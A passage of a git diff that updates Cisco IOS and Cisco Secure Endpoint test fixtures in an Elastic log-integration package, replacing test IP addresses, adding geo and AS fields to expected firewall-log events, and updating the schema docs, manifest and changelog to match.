packet", + "ingested": "2021-12-09T13:35:26.832459800Z", + "original": "Feb 8 04:00:48 192.168.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 192.168.100.197 -\u003e 224.0.0.22, 1 packet", "code": "IPACCESSLOGRP", "provider": "firewall", "action": "deny", @@ -57,7 +57,7 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { @@ -66,15 +66,15 @@ }, "source": { "packets": 1, - "address": "198.51.100.2", - "ip": "198.51.100.2" + "address": "192.168.100.2", + "ip": "192.168.100.2" }, - "message": "list INBOUND-ON-F11 denied igmp 198.51.100.2 -\u003e 224.0.0.2 (20), 1 packet", + "message": "list INBOUND-ON-F11 denied igmp 192.168.100.2 -\u003e 224.0.0.2 (20), 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:gg8i3117u+0XZ7S0E0dl04HE4qw=", + "community_id": "1:eM790E01lXKYULfDPBPP0umazRw=", "transport": "igmp", "type": "ipv4", "packets": 1 @@ -87,15 +87,15 @@ }, "related": { "ip": [ - "198.51.100.2", + "192.168.100.2", "224.0.0.2" ] }, "event": { "severity": 6, "sequence": 585918, - "ingested": "2021-09-07T07:59:38.898643500Z", - "original": "Feb 9 04:00:48 198.51.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 198.51.100.2 -\u003e 224.0.0.2 (20), 1 packet", + "ingested": "2021-12-09T13:35:26.832466400Z", + "original": "Feb 9 04:00:48 192.168.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 192.168.100.2 -\u003e 224.0.0.2 (20), 1 packet", "code": "IPACCESSLOGSP", "provider": "firewall", "action": "deny", @@ -113,7 +113,7 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { @@ -122,10 +122,10 @@ }, "source": { "packets": 1, - "address": "198.51.100.1", - "ip": "198.51.100.1" + "address": "192.168.100.1", + "ip": "192.168.100.1" }, - "message": "list 171 denied 0 198.51.100.1 -\u003e 255.255.255.255, 1 packet", + "message": "list 171 denied 0 192.168.100.1 -\u003e 255.255.255.255, 1 packet", "tags": [ "preserve_original_event" ], @@ -139,15 +139,15 @@ }, "related": { "ip": [ - "198.51.100.1", + "192.168.100.1", "255.255.255.255" ] }, "event": { "severity": 6, "sequence": 585919, - "ingested": "2021-09-07T07:59:38.898651100Z", - "original": "Feb 10 04:00:48 198.51.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 198.51.100.1 -\u003e 255.255.255.255, 1 packet", + "ingested": "2021-12-09T13:35:26.832471900Z", + "original": "Feb 10 04:00:48 192.168.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 192.168.100.1 -\u003e 255.255.255.255, 1 packet", "code": "IPACCESSLOGNP", "provider": "firewall", "action": "deny", @@ -165,26 +165,56 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 22, - "address": "2001:DB8:1000::1", - "ip": "2001:DB8:1000::1" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { - "address": "2001:DB8::3", + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 1027, "packets": 9, - "ip": "2001:DB8::3" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, - "message": "list ACL-IPv6-E0/0-IN/10 permitted tcp 2001:DB8::3(1027) -\u003e 2001:DB8:1000::1(22), 9 packets", + "message": "list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -\u003e 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:MFLZEQR2gBCpxJEXRvaB0jjkxNA=", + "community_id": "1:BI3p2ifMfqVkYuAqbGRcjozcbnA=", "transport": "tcp", "type": "ipv6", "packets": 9 @@ -194,15 +224,14 @@ }, "related": { "ip": [ - "2001:DB8::3", - "2001:DB8:1000::1" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { "severity": 6, "sequence": 585920, - "ingested": "2021-09-07T07:59:38.898657Z", - "original": "May 3 19:11:33 198.51.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2001:DB8::3(1027) -\u003e 2001:DB8:1000::1(22), 9 packets", + "ingested": "2021-12-09T13:35:26.832477600Z", + "original": "May 3 19:11:33 192.168.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -\u003e 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets", "code": "ACCESSLOGP", "provider": "firewall", "action": "allow", @@ -220,26 +249,26 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { "port": 15600, - "address": "198.51.100.255", - "ip": "198.51.100.255" + "address": "192.168.100.255", + "ip": "192.168.100.255" }, "source": { - "address": "198.51.100.195", + "address": "192.168.100.195", "port": 55250, "packets": 1, - "ip": "198.51.100.195" + "ip": "192.168.100.195" }, - "message": "list 177 denied udp 198.51.100.195(55250) -\u003e 198.51.100.255(15600), 1 packet", + "message": "list 177 denied udp 192.168.100.195(55250) -\u003e 192.168.100.255(15600), 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:7qvTEOLkmhTrK1y9mKNwCENQbeU=", + "community_id": "1:StJhZzrkK7s6tPeVb3BmxbE0NZ0=", "transport": "udp", "type": "ipv4", "packets": 1 @@ -249,15 +278,15 @@ }, "related": { "ip": [ - "198.51.100.195", - "198.51.100.255" + "192.168.100.195", + "192.168.100.255" ] }, "event": { "severity": 6, "sequence": 1663303, - "ingested": "2021-09-07T07:59:38.898662100Z", - "original": "Jun 20 02:41:40 198.51.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(55250) -\u003e 198.51.100.255(15600), 1 packet", + "ingested": "2021-12-09T13:35:26.832482100Z", + "original": "Jun 20 02:41:40 192.168.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(55250) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", "action": "deny", @@ -275,19 +304,19 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { - "address": "198.51.100.2", - "ip": "198.51.100.2" + "address": "192.168.100.2", + "ip": "192.168.100.2" }, "source": { "packets": 1, - "address": "198.51.100.1", - "ip": "198.51.100.1" + "address": "192.168.100.1", + "ip": "192.168.100.1" }, - "message": "list 151 denied icmp 198.51.100.1 -\u003e 198.51.100.2 (3/4), 1 packet", + "message": "list 151 denied icmp 192.168.100.1 -\u003e 192.168.100.2 (3/4), 1 packet", "icmp": { "type": "3", "code": "4" @@ -296,7 +325,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:9lO0Kj0TpXAVNWuiPRAyFAGtCqM=", + "community_id": "1:qFmXhpjtK+/aneNSpMgRiI7dwi4=", "transport": "icmp", "type": "ipv4", "packets": 1 @@ -306,15 +335,15 @@ }, "related": { "ip": [ - "198.51.100.1", - "198.51.100.2" + "192.168.100.1", + "192.168.100.2" ] }, "event": { "severity": 6, "sequence": 1663304, - "ingested": "2021-09-07T07:59:38.898667600Z", - "original": "Jun 20 02:41:45 198.51.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 198.51.100.1 -\u003e 198.51.100.2 (3/4), 1 packet", + "ingested": "2021-12-09T13:35:26.832487Z", + "original": "Jun 20 02:41:45 192.168.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 192.168.100.1 -\u003e 192.168.100.2 (3/4), 1 packet", "code": "IPACCESSLOGDP", "provider": "firewall", "action": "deny", @@ -332,26 +361,26 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { "port": 15600, - "address": "198.51.100.255", - "ip": "198.51.100.255" + "address": "192.168.100.255", + "ip": "192.168.100.255" }, "source": { - "address": "198.51.100.195", + "address": "192.168.100.195", "port": 54309, "packets": 1, - "ip": "198.51.100.195" + "ip": "192.168.100.195" }, - "message": "list 177 denied udp 198.51.100.195(54309) -\u003e 198.51.100.255(15600), 1 packet", + "message": "list 177 denied udp 192.168.100.195(54309) -\u003e 192.168.100.255(15600), 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:UaC2rOjKSQBEmX+jEyiQatg9eGI=", + "community_id": "1:l5C5fxVKRjXx6kz2MZOPm+0MjuU=", "transport": "udp", "type": "ipv4", "packets": 1 @@ -361,15 +390,15 @@ }, "related": { "ip": [ - "198.51.100.195", - "198.51.100.255" + "192.168.100.195", + "192.168.100.255" ] }, "event": { "severity": 6, "sequence": 1663312, - "ingested": "2021-09-07T07:59:38.898672600Z", - "original": "Jun 20 02:42:28 198.51.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(54309) -\u003e 198.51.100.255(15600), 1 packet", + "ingested": "2021-12-09T13:35:26.832491400Z", + "original": "Jun 20 02:42:28 192.168.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(54309) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", "action": "deny", @@ -390,14 +419,14 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "event": { "severity": 6, "sequence": 1663313, - "ingested": "2021-09-07T07:59:38.898677200Z", - "original": "Jun 20 02:42:28 198.51.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets", + "ingested": "2021-12-09T13:35:26.832496700Z", + "original": "Jun 20 02:42:28 192.168.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets", "code": "IPACCESSLOGRL", "provider": "firewall", "category": "network", @@ -417,26 +446,26 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { "port": 15600, - "address": "198.51.100.255", - "ip": "198.51.100.255" + "address": "192.168.100.255", + "ip": "192.168.100.255" }, "source": { - "address": "198.51.100.195", + "address": "192.168.100.195", "port": 43989, "packets": 1, - "ip": "198.51.100.195" + "ip": "192.168.100.195" }, - "message": "list 177 denied udp 198.51.100.195(43989) -\u003e 198.51.100.255(15600), 1 packet", + "message": "list 177 denied udp 192.168.100.195(43989) -\u003e 192.168.100.255(15600), 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:CdrzBOQ6Cohqy+Mgg9EZnl1nHFs=", + "community_id": "1:qEu4RGH+VDqSvCYBmcpiipbHIFc=", "transport": "udp", "type": "ipv4", "packets": 1 @@ -446,15 +475,15 @@ }, "related": { "ip": [ - "198.51.100.195", - "198.51.100.255" + "192.168.100.195", + "192.168.100.255" ] }, "event": { "severity": 6, "sequence": 1663314, - "ingested": "2021-09-07T07:59:38.898681700Z", - "original": "Jun 20 02:42:34 198.51.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(43989) -\u003e 198.51.100.255(15600), 1 packet", + "ingested": "2021-12-09T13:35:26.832503Z", + "original": "Jun 20 02:42:34 192.168.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(43989) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", "action": "deny", @@ -472,41 +501,44 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "172.217.10.46", + "address": "81.2.69.144", "port": 80, - "ip": "172.217.10.46" + "ip": "81.2.69.144" }, "source": { - "address": "198.51.100.12", + "address": "192.168.100.12", "port": 59832, "packets": 1, - "ip": "198.51.100.12" + "ip": "192.168.100.12" }, - "message": "list 150 denied tcp 198.51.100.12(59832) -\u003e 172.217.10.46(80), 1 packet", + "message": "list 150 denied tcp 192.168.100.12(59832) -\u003e 81.2.69.144(80), 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:VrawQ+fBZ7zfHStQfvTOW1zQANA=", + "community_id": "1:KHXR26FFI5fAjbqPIM0o9njIDr0=", "transport": "tcp", "type": "ipv4", "packets": 1 @@ -516,15 +548,15 @@ }, "related": { "ip": [ - "198.51.100.12", - "172.217.10.46" + "192.168.100.12", + "81.2.69.144" ] }, "event": { "severity": 6, "sequence": 1663321, - "ingested": "2021-09-07T07:59:38.898686400Z", - "original": "Jun 20 02:43:09 198.51.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59832) -\u003e 172.217.10.46(80), 1 packet", + "ingested": "2021-12-09T13:35:26.832509400Z", + "original": "Jun 20 02:43:09 192.168.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59832) -\u003e 81.2.69.144(80), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", "action": "deny", @@ -545,14 +577,14 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "event": { "severity": 6, "sequence": 1663325, - "ingested": "2021-09-07T07:59:38.898692200Z", - "original": "Jun 20 02:43:29 198.51.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets", + "ingested": "2021-12-09T13:35:26.832517300Z", + "original": "Jun 20 02:43:29 192.168.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets", "code": "IPACCESSLOGRL", "provider": "firewall", "category": "network", @@ -572,19 +604,19 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { - "address": "198.51.100.1", - "ip": "198.51.100.1" + "address": "192.168.100.1", + "ip": "192.168.100.1" }, "source": { "packets": 32, - "address": "198.51.100.12", - "ip": "198.51.100.12" + "address": "192.168.100.12", + "ip": "192.168.100.12" }, - "message": "list 150 denied icmp 198.51.100.12 -\u003e 198.51.100.1 (3/3), 32 packets", + "message": "list 150 denied icmp 192.168.100.12 -\u003e 192.168.100.1 (3/3), 32 packets", "icmp": { "type": "3", "code": "3" @@ -593,7 +625,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:huj4hjTG/rbN+R5GhpV6YHP1sYM=", + "community_id": "1:iJX04o1L7tLCbqhG80H5P/Nx4FY=", "transport": "icmp", "type": "ipv4", "packets": 32 @@ -603,15 +635,15 @@ }, "related": { "ip": [ - "198.51.100.12", - "198.51.100.1" + "192.168.100.12", + "192.168.100.1" ] }, "event": { "severity": 6, "sequence": 1663326, - "ingested": "2021-09-07T07:59:38.898696900Z", - "original": "Jun 20 02:43:29 198.51.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 198.51.100.12 -\u003e 198.51.100.1 (3/3), 32 packets", + "ingested": "2021-12-09T13:35:26.832521600Z", + "original": "Jun 20 02:43:29 192.168.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 192.168.100.12 -\u003e 192.168.100.1 (3/3), 32 packets", "code": "IPACCESSLOGDP", "provider": "firewall", "action": "deny", @@ -629,41 +661,44 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "172.217.10.46", + "address": "81.2.69.144", "port": 80, - "ip": "172.217.10.46" + "ip": "81.2.69.144" }, "source": { - "address": "198.51.100.12", + "address": "192.168.100.12", "port": 59834, "packets": 1, - "ip": "198.51.100.12" + "ip": "192.168.100.12" }, - "message": "list 150 denied tcp 198.51.100.12(59834) -\u003e 172.217.10.46(80), 1 packet", + "message": "list 150 denied tcp 192.168.100.12(59834) -\u003e 81.2.69.144(80), 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:5enMmUgQViWG28IC5W6/9cYJ6EA=", + "community_id": "1:Nww0Z+gJpZXiHgUEpOLnoLROtqw=", "transport": "tcp", "type": "ipv4", "packets": 1 @@ -673,15 +708,15 @@ }, "related": { "ip": [ - "198.51.100.12", - "172.217.10.46" + "192.168.100.12", + "81.2.69.144" ] }, "event": { "severity": 6, "sequence": 1663327, - "ingested": "2021-09-07T07:59:38.898701400Z", - "original": "Jun 20 02:43:30 198.51.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59834) -\u003e 172.217.10.46(80), 1 packet", + "ingested": "2021-12-09T13:35:26.832527Z", + "original": "Jun 20 02:43:30 192.168.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59834) -\u003e 81.2.69.144(80), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", "action": "deny", @@ -699,7 +734,7 @@ "log": { "level": "notification", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { @@ -733,8 +768,8 @@ "event": { "severity": 5, "sequence": 1991219, - "ingested": "2021-09-07T07:59:38.898705900Z", - "original": "Mar 24 18:06:03 198.51.100.2 1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021", + "ingested": "2021-12-09T13:35:26.832533500Z", + "original": "Mar 24 18:06:03 192.168.100.2 1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021", "code": "LOGIN_SUCCESS", "provider": "firewall", "category": "network", @@ -762,7 +797,7 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "source": { @@ -776,8 +811,8 @@ "event": { "severity": 6, "sequence": 1991220, - "ingested": "2021-09-07T07:59:38.898710400Z", - "original": "Mar 24 18:06:00 198.51.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9)", + "ingested": "2021-12-09T13:35:26.832539800Z", + "original": "Mar 24 18:06:00 192.168.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9)", "code": "LOGOUT", "provider": "firewall", "category": "network", @@ -804,7 +839,7 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { @@ -835,8 +870,8 @@ "severity": 6, "sequence": 1991221, "reason": "Invalid RP", - "ingested": "2021-09-07T07:59:38.898719300Z", - "original": "Mar 24 17:37:39 198.51.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", + "ingested": "2021-12-09T13:35:26.832546Z", + "original": "Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", "code": "INVALID_RP_JOIN", "provider": "firewall", "action": "multicast-join", @@ -861,7 +896,7 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { @@ -892,8 +927,8 @@ "severity": 6, "sequence": 1991221, "reason": "Invalid RP", - "ingested": "2021-09-07T07:59:38.898723900Z", - "original": "Mar 24 17:37:39 198.51.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", + "ingested": "2021-12-09T13:35:26.832551200Z", + "original": "Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", "code": "INVALID_RP_JOIN", "provider": "firewall", "action": "multicast-join", @@ -924,14 +959,14 @@ "log": { "level": "warning", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "event": { "severity": 4, "sequence": 1991217, - "ingested": "2021-09-07T07:59:38.898728100Z", - "original": "Mar 24 12:09:35 198.51.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0", + "ingested": "2021-12-09T13:35:26.832556400Z", + "original": "Mar 24 12:09:35 192.168.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0", "code": "NOVALIDKEY", "provider": "firewall", "category": "network", @@ -954,14 +989,14 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "event": { "severity": 6, "sequence": 1991218, - "ingested": "2021-09-07T07:59:38.898732400Z", - "original": "Mar 24 12:06:47 198.51.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 19", + "ingested": "2021-12-09T13:35:26.832560700Z", + "original": "Mar 24 12:06:47 192.168.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 19", "code": "CALL_PRESERVED", "provider": "firewall", "category": "network", diff --git a/packages/cisco_ios/data_stream/log/fields/ecs.yml b/packages/cisco_ios/data_stream/log/fields/ecs.yml index 0439aa8651e..005eed89496 100644 --- a/packages/cisco_ios/data_stream/log/fields/ecs.yml +++ b/packages/cisco_ios/data_stream/log/fields/ecs.yml @@ -6,6 +6,12 @@ name: destination.as.number - external: ecs name: destination.as.organization.name +- external: ecs + name: destination.geo.city_name +- external: ecs + name: destination.geo.region_iso_code +- external: ecs + name: destination.geo.region_name - external: ecs name: destination.geo.continent_name - external: ecs @@ -82,5 +88,25 @@ name: source.port - external: ecs name: source.user.name +- external: ecs + name: source.as.number +- external: ecs + name: source.as.organization.name +- external: ecs + name: source.geo.continent_name +- external: ecs + name: source.geo.country_iso_code +- external: ecs + name: source.geo.country_name +- external: ecs + name: source.geo.city_name +- external: ecs + name: source.geo.region_iso_code +- external: ecs + name: source.geo.region_name +- description: Longitude and latitude. + level: core + name: source.geo.location + type: geo_point - external: ecs name: tags diff --git a/packages/cisco_ios/docs/README.md b/packages/cisco_ios/docs/README.md index 3c2aa3f2c6e..6b0bdbd335e 100644 --- a/packages/cisco_ios/docs/README.md +++ b/packages/cisco_ios/docs/README.md @@ -131,10 +131,13 @@ An example event for `log` looks as following: | destination.address | Some event destination addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | | destination.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | | destination.as.organization.name | Organization name. | keyword | +| destination.geo.city_name | City name. | keyword | | destination.geo.continent_name | Name of the continent. | keyword | | destination.geo.country_iso_code | Country ISO code. | keyword | | destination.geo.country_name | Country name. | keyword | | destination.geo.location | Longitude and latitude. | geo_point | +| destination.geo.region_iso_code | Region ISO code. | keyword | +| destination.geo.region_name | Region name. | keyword | | destination.ip | IP address of the destination (IPv4 or IPv6). | ip | | destination.port | Port of the destination. | long | | ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | @@ -192,6 +195,15 @@ An example event for `log` looks as following: | related.ip | All of the IPs seen on your event. | ip | | related.user | All the user names or other user identifiers seen on the event. | keyword | | source.address | Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| source.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | +| source.as.organization.name | Organization name. | keyword | +| source.geo.city_name | City name. | keyword | +| source.geo.continent_name | Name of the continent. | keyword | +| source.geo.country_iso_code | Country ISO code. | keyword | +| source.geo.country_name | Country name. | keyword | +| source.geo.location | Longitude and latitude. | geo_point | +| source.geo.region_iso_code | Region ISO code. | keyword | +| source.geo.region_name | Region name. | keyword | | source.ip | IP address of the source (IPv4 or IPv6). | ip | | source.packets | Packets sent from the source to the destination. | long | | source.port | Port of the source. | long | diff --git a/packages/cisco_ios/manifest.yml b/packages/cisco_ios/manifest.yml index fd74025767e..40e349f8834 100644 --- a/packages/cisco_ios/manifest.yml +++ b/packages/cisco_ios/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_ios title: Cisco IOS -version: 1.2.0 +version: 1.2.1 license: basic description: Collect logs from Cisco IOS with Elastic Agent. type: integration diff --git a/packages/cisco_secure_endpoint/changelog.yml b/packages/cisco_secure_endpoint/changelog.yml index df61cfa6363..ae08da24345 100644 --- a/packages/cisco_secure_endpoint/changelog.yml +++ b/packages/cisco_secure_endpoint/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.2.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log index 211de5d2bc9..db356536df5 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log @@ -1,49 +1,49 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}} 